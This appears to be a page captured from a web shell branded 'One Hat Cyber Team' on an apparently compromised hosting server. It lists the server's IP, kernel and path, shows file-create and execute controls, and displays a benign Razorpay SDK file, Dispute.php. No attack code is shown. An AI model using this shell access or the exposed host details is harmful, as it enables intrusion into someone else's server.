⚝
One Hat Cyber Team
⚝
Your IP:
3.144.199.9
Server IP:
162.254.39.145
Server:
Linux premium289.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
favoaysf
/
www
/
vendor
/
razorpay
/
razorpay
/
src
/
View File Name :
Dispute.php
<?php namespace Razorpay\Api; class Dispute extends Entity { public function create($attributes = array()) { return parent::create($attributes); } public function fetch($id) { return parent::fetch($id); } public function all($options = array()) { return parent::all($options); } public function accept() { $entityUrl = $this->getEntityUrl(). $this->id. '/accept'; return $this->request('POST', $entityUrl); } public function contest($attributes = array()) { $entityUrl = $this->getEntityUrl(). $this->id. '/contest'; return $this->request('PATCH', $entityUrl, $attributes); } }